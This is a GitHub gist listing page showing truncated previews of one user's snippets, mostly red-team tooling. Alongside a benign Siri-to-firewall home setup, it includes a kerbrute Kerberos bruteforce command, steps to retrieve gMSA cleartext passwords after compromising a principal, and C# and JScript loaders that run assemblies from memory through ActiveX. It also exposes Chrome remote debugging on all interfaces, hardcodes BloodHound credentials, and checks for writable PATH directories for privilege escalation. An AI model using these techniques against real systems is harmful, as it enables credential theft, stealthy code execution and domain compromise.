Skip to content

Instantly share code, notes, and snippets.

@NotMedic
NotMedic / Instructions.txt
Created December 2, 2018 02:29
Siri -> HomeBridge -> HomeBridge-ssh -> iptables
This is a pretty simple setup:
Siri is used to control Homebridge using the HomeKit protocol.
Homebridge has a module named Homebridge-ssh that allows you to run commands over ssh.
There is a shell script on an OpenWrt box to enable, disable, and check the status of a MAC Address block in the FORWARD table.
1. Install node on your platform. I went with 8.9 for no specific reason other than I initially had issues with 10 that probably weren't related..
2. Install homebridge and homebridge-ssh. You should probably also put hombridge-config-ui-x on there too... I used the unsafe-perm parameter after getting a significant number of errors:
sudo -i npm install -g homebridge --unsafe-perm
sudo -i npm install -g homebridge-ssh --unsafe-perm
@NotMedic
NotMedic / markvulnerable.py
Last active July 11, 2019 02:11
Script to mark hosts as vulnerable in Bloodhound.
#!/usr/bin/python
import sys, json, urllib, urllib2
#Define the Bloodhound Database
url = 'http://bloodhound-server:7474/db/data/cypher/'
#Define the Bloodhound Credentials
#echo neo4j:bloodhound | base64
base64auth = 'bmVvNGo6Ymxvb2Rob3VuZA=='
request = urllib2.Request(url)
@NotMedic
NotMedic / gcp-gpu-vm-hashcat.md
Created May 3, 2019 15:26 — forked from koenrh/gcp-gpu-vm-hashcat.md
Running Hashcat on Google Cloud's new GPU-based VMs

Running Hashcat on Google Cloud's GPU-based VMs

In February 2017, Google announced the availability GPU-based VMs. I spun up a few of these instances, and ran some benchmarks. Along the way, I wrote down the steps taken to provision these VM instances, and install relevant drivers.

Update April 2019: Updated instructions to use instances with the Tesla T4 GPUs.

@NotMedic
NotMedic / TestAssembly.cs
Last active July 23, 2020 15:39 — forked from Arno0x/TestAssembly.cs
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
/*
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
*/
using System.Windows.Forms;
namespace TestNamespace
@NotMedic
NotMedic / Instructions.md
Created November 7, 2019 20:10
Headless Remote Chrome Debugging - Ichabod Chrome :)

Target

Start Chrome with the following flags:

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"

--remote-debugging-port=9222

--remote-debugging-address=0.0.0.0

@NotMedic
NotMedic / Notes.txt
Created January 15, 2020 14:04
Group Managed Service Account Password Retrieval
#From: https://www.dsinternals.com/en/retrieving-cleartext-gmsa-passwords-from-active-directory/
#Install the DSInterals Powershell Module
Install-Module -Name DSInternals -Force
#Import it.
Import-Module DSInternals
#Identify which users can recover the GMSA Account's Password. Compromise one of those Principals.
Get-ADServiceAccount -Identity GMSAccount -Properties PrincipalsAllowedToRetrieveManagedPassword
@NotMedic
NotMedic / kerberos_attacks_cheatsheet.md
Created January 15, 2020 19:56 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@NotMedic
NotMedic / snippet.cs
Created March 24, 2020 23:55 — forked from silentbreaksec/snippet.cs
Convert C# EXE to Assembly
[DllImport("shell32.dll", SetLastError = true)]
static extern IntPtr CommandLineToArgvW([MarshalAs(UnmanagedType.LPWStr)] string lpCmdLine, out int pNumArgs);
public static string[] CommandLineToArgs(string commandLine)
{
int argc;
var argv = CommandLineToArgvW(commandLine, out argc);
if (argv == IntPtr.Zero)
throw new System.ComponentModel.Win32Exception();
try
@NotMedic
NotMedic / basic.js
Created March 31, 2020 16:56
Basic / MyDLL
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Windows\\System32\\Tasks';
//new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_ASM') = "mydll, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null"
//new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_TYPE') = "MyAppDomainManager";
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"> <dependency><dependentAssembly> <assemblyIdentity name="tasks" version="0.0.0.0"/> </dependentAssembly> </dependency> <assemblyIdentity name="tasks" type="win32" version="0.0.0.0" /><description>Built with love by Casey Smith @subTee </description><clrClass name="MyDLL.Operations" clsid="{31D2B969-7608-426E-9D8E-A09FC9A5ACDC}" progid="MyDLL.Operations" ru
@NotMedic
NotMedic / acltest.ps1
Created April 2, 2020 17:18 — forked from wdormann/acltest.ps1
Check for paths that are writable by normal users, but are in the system-wide Windows path. Any such directory allows for privilege escalation.
If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
Write-Warning "This script will not function with administrative privileges. Please run as a normal user."
Break
}
$outfile = "acltestfile"
set-variable -name paths -value (Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment' -Name PATH).path.Split(";")
Foreach ($path in $paths) {
# This prints a table of ACLs
# get-acl $path | %{ $_.Access } | ft -Wrap -AutoSize -property IdentityReference, AccessControlType, FileSystemRights